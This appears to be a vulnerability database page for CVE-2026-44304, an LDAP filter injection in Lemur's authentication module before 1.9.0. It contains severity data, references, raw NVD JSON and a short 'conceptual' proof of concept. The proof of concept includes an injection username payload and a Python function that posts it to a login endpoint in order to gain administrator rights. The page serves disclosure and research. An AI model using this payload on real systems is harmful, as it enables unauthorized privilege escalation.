CVE-2026-44304

Description

Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitized user input via Python string interpolation. An authenticated LDAP user can inject LDAP filter metacharacters through the username field to manipulate group membership queries and escalate their privileges to administrator. This vulnerability is fixed in 1.9.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Lemur < 1.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-44304
# The vulnerability allows injection via the username field in LDAP auth.

# Malicious payload to inject into the username field
# This attempts to manipulate the group membership check logic
payload_username = "valid_user)(|(memberOf=cn=admins,ou=groups,dc=example,dc=com)"

# Example of how the vulnerable filter construction might look in Python (lemur/auth/ldap.py)
# username = request.json['username']
# ldap_filter = f"(uid={username})"
# Resulting filter: (uid=valid_user)(|(memberOf=cn=admins,ou=groups,dc=example,dc=com))

import requests

def exploit_ldap_injection(target_url, ldap_password):
    data = {
        "username": payload_username,
        "password": ldap_password
    }
    # Sending the malicious login request
    response = requests.post(target_url, data=data)
    if response.status_code == 200 and "admin" in response.text:
        print("Privilege escalation potentially successful!")
    else:
        print("Exploit failed or patch applied.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44304
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44304
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44304/
[4] VulDB https://vuldb.com/cve/CVE-2026-44304
[5] https://github.com/Netflix/lemur/security/advisories/GHSA-3r34-vq8m-39gh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44304", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:37.140", "lastModified": "2026-05-12T22:16:37.140", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitized user input via Python string interpolation. An authenticated LDAP user can inject LDAP filter metacharacters through the username field to manipulate group membership queries and escalate their privileges to administrator. This vulnerability is fixed in 1.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-90"}]}], "references": [{"url": "https://github.com/Netflix/lemur/security/advisories/GHSA-3r34-vq8m-39gh", "source": "[email protected]"}]}}